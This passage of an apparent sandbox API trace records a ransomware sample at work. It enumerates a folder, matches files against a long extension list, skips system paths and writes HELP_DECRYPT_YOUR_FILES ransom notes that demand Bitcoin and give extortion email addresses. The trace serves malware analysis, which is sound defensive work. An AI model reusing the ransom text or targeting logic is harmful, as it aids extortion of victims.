lpSrch=".rbs") returned 0x0
	[0168.090] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalTraceStore", cAlternateFileName="LOCALT~1")) returned 1
	[0168.090] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd17b1a49, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x36edfa80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="parse.dat", cAlternateFileName="")) returned 1
	[0168.091] lstrcmpW (lpString1="parse.dat", lpString2="..") returned 1
	[0168.091] lstrcmpW (lpString1="parse.dat", lpString2=".") returned 1
	[0168.091] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.091] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="parse.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat"
	[0168.091] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat") returned 48
	[0168.091] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.091] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat", cchLength=0x30 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\parse.dat") returned 0x30
	[0168.091] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\parse.dat" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\parse.dat") returned="c:\\users\\all users\\microsoft\\diagnosis\\parse.dat"
	[0168.092] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\parse.dat") returned 48
	[0168.092] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.092] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0168.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.092] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.093] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sideload", cAlternateFileName="")) returned 1
	[0168.093] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Siufloc", cAlternateFileName="")) returned 1
	[0168.093] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftLanding", cAlternateFileName="SOFTLA~1")) returned 1
	[0168.093] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 1
	[0168.093] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 0
	[0168.093] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0168.093] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0168.098] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.098] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*"
	[0168.098] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.098] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.099] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\HELP_DECRYPT_YOUR_FILES.TXT") returned 66
	[0168.099] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.103] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.103] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.105] CloseHandle (hObject=0x384) returned 1
	[0168.106] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.107] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0168.108] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.108] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.108] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.108] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.108] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0168.109] CloseHandle (hObject=0x384) returned 1
	[0168.110] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.110] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.110] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.110] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\HELP_DECRYPT_YOUR_FILES.HTML") returned 67
	[0168.110] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.111] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.111] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0168.114] CloseHandle (hObject=0x384) returned 1
	[0168.114] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.115] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.115] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0168.116] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.116] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.117] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.117] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.117] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0168.117] CloseHandle (hObject=0x384) returned 1
	[0168.118] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7dbc436f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0168.118] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*") returned 42
	[0168.118] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.118] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*", cchLength=0x2a | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\*.*") returned 0x2a
	[0168.118] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.118] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="windows") returned 0x0
	[0168.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.119] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="boot") returned 0x0
	[0168.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.119] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="system volume information") returned 0x0
	[0168.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.119] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.120] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="temp") returned 0x0
	[0168.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.120] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="program files") returned 0x0
	[0168.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.120] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.120] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="appdata") returned 0x0
	[0168.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.121] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="application data") returned 0x0
	[0168.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.121] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="winnt") returned 0x0
	[0168.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.121] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="tmp") returned 0x0
	[0168.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.121] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="cache") returned 0x0
	[0168.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.122] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.122] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="webcache") returned 0x0
